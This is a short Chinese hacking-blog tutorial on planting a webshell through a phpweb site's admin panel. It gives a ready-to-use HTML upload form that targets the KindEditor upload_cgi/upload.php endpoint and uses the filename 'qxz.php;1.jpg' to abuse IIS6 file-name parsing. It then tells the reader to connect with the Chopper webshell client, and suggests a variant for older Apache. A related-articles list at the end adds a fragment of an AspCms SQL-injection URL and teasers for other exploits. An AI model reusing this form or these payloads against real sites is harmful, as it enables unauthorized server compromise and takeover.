phpweb后台拿shell简单 ***

hacker5年前黑客文章755
关于phpweb后台拿shell简单 *** 。
 
首先登录后台admin.php
phpweb
 
登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地址。 
 
代码文件如下:
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
 
然后选择你的马儿再上传
0131203233947
 
上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。
 
203233848
 


 
菜刀链接看下
 
t234952
 
PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg
 
代码文件下载地址:http://pan.baidu.com/s/1eRzHs


标签: 黑客技术

相关文章

aspcms各版本漏洞0day集合

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,pa...

看着你的秘密——网络嗅探技术简介

 嗅探器(Sniff)是能够捕获网络报文的设备,可以理解为一个安装在计算机上的窃听设备,它可以用来窃听计算机在网络上所产生的众多的信息,今天给大家简单讲讲嗅探技术。 一、原理及分类 要了解嗅...

TamperData是否适用全部电脑操作系统?

TamperData是否适用全部电脑操作系统?

什么叫Tamper Data? Tamper Data是Mozilla Firefox拓展,能够在推送HTTP恳求以前改动和查询HTTP恳求。它将显示信息Web电脑浏览器意味着您推送的数据信息,比如...

Thinkphp框架任意代码执行漏洞利用及修复

ThinkPHP是一个开源的PHP框架, 是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循 Apache...

社会发展技术工程师工具箱

社会发展技术工程师工具箱

Social Engineer Toolkit 翻译中文可称:社会发展技术工程师工具箱;   什么是社会技术工程师工具箱? 由TrustedSec的创办人编写,社交媒体技术工程师工具箱(S...

WindowsServer2003R2版本号IIS6

WindowsServer2003R2版本号IIS6

今天第三篇实例教程,大家立即用CVE-2017-7269系统漏洞开展一次实战演练检测。三篇文章内容你融汇贯通了,基础算黑客入门了。   微软公司层面也早已确定了该系统漏洞:Windows...